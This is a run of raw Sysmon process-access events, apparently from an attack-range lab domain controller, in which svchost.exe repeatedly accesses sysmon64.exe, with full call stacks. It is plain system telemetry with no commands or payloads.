08:41:22.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.371{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 